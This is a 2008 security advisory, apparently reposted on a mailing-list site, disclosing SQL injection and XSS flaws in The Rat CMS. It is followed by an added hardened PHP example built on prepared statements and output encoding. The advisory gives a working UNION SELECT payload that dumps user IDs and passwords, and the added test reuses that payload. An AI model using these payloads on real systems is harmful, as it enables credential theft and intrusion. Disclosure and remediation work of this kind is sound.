Information Security


Additional information

  Daily summary of security vulnerabilities in Web applications (PHP, ASP, JSP, CGI, Perl)

  Multiple vulnerabilities in TietoEnator's Procapita school administration system, at least version "842 Procapita 840SP1"

  [ECHO_ADV_99$2008] Relative Real Estate Systems <= 3.0 (listing_id) Sql Injection Vulnerability

  RSS-aggregator (display) Remote File Inclusion Vulnerability

  IdeBox (include) Remote File Inclusion Vulnerability

From: tan_prathan_(at)_hotmail.com <tan_prathan_(at)_hotmail.com>
Date: 26 June 2008
Subject: The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities

==========================================================
 The Rat CMS (SQL/XSS) Multiple Remote Vulnerabilities
==========================================================

 ,--^----------,--------,-----,-------^--,
 | |||||||||   `--------'     |          O     .. CWH Underground Hacking Team ..
 `+---------------------------^----------|
   `\_,-------, _________________________|
     / XXXXXX /`|     /
    / XXXXXX /  `\   /
   / XXXXXX /\______(
  / XXXXXX /           
 / XXXXXX /
(________(             
 `------'


AUTHOR : CWH Underground
DATE   : 25 June 2008
SITE   : cwh.citec.us


#####################################################
APPLICATION : The Rat CMS
VERSION     : Pre-Alpha 2
VENDOR      : N/A
DOWNLOAD    : http://downloads.sourceforge.net/the-rat-cms
#####################################################

--- Remote SQL Injection ---

---------------------------------------
Vulnerable File [viewarticle.php?id=]
---------------------------------------

@Line 5

  73:  $query = "SELECT title, content FROM news WHERE id=".$_GET['id'];
  74:  $result = mysql_query($query) or die('Error : ' . mysql_error());
  75:  $row = mysql_fetch_array($result, MYSQL_ASSOC);


---------
Exploit
---------

[+] http://[Target]/[trcms_path]/viewarticle.php?id=[SQL Injection]
[+] http://[Target]/[trcms_path]/viewarticle2.php?id=[SQL Injection]


-------------
POC Exploit
-------------

http://192.168.24.25/trcms/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--
http://192.168.24.25/trcms/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--


--- Remote XSS ---

---------
Exploit
---------

[+] http://[Target]/[trcms_path]/viewarticle.php/<XSS>
[+] http://[Target]/[trcms_path]/viewarticle.php?id=<XSS>
[+] http://[Target]/[trcms_path]/viewarticle2.php?id=<XSS>

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################
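
A hardened counterpart to the viewarticle.php lines quoted in the advisory, added here as an example; it is not code from The Rat CMS or from the advisory's author. It assumes PHP 7.4+ with the PDO SQLite driver, uses a hypothetical view_article() helper and a constructed in-memory database, and treats the echoed mysql_error() text as a likely reflection point for the reported XSS (an assumption the advisory does not confirm).

```php
<?php
// Added example, not The Rat CMS code. Table and column names follow the
// advisory; the in-memory SQLite database and its rows are constructed.
declare(strict_types=1);

function open_demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, content TEXT)');
    $db->exec('CREATE TABLE tbl_auth_user (user_id TEXT, user_password TEXT)');
    $db->exec("INSERT INTO news VALUES (1, 'Hello <b>world</b>', 'First post')");
    $db->exec("INSERT INTO tbl_auth_user VALUES ('admin', 'constructed-hash')");
    return $db;
}

// Returns [HTTP status, body]. Hypothetical helper standing in for viewarticle.php.
function view_article(PDO $db, $rawId): array {
    // 1. Accept only a positive integer; anything else never reaches SQL.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [400, 'Bad request'];           // fixed text, input is not echoed
    }
    try {
        // 2. Bind the value instead of concatenating it into the query string.
        $stmt = $db->prepare('SELECT title, content FROM news WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        error_log($e->getMessage());           // 3. DB errors go to the log only
        return [500, 'Internal error'];
    }
    if ($row === false) {
        return [404, 'Not found'];
    }
    // 4. Encode on output so stored or reflected markup is rendered inert.
    $esc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return [200, '<h1>' . $esc($row['title']) . '</h1><p>' . $esc($row['content']) . '</p>'];
}

$db = open_demo_db();
$inputs = ['1', '2', '<script>alert(1)</script>',   // constructed sample ids
           '-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--'];
foreach ($inputs as $in) {
    [$status, $body] = view_article($db, $in);
    echo $status, ' ', $body, PHP_EOL;
}
```

Run with the PHP CLI; only the first input returns the article, with its title HTML-encoded, and the non-numeric ids are rejected before any query is built.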
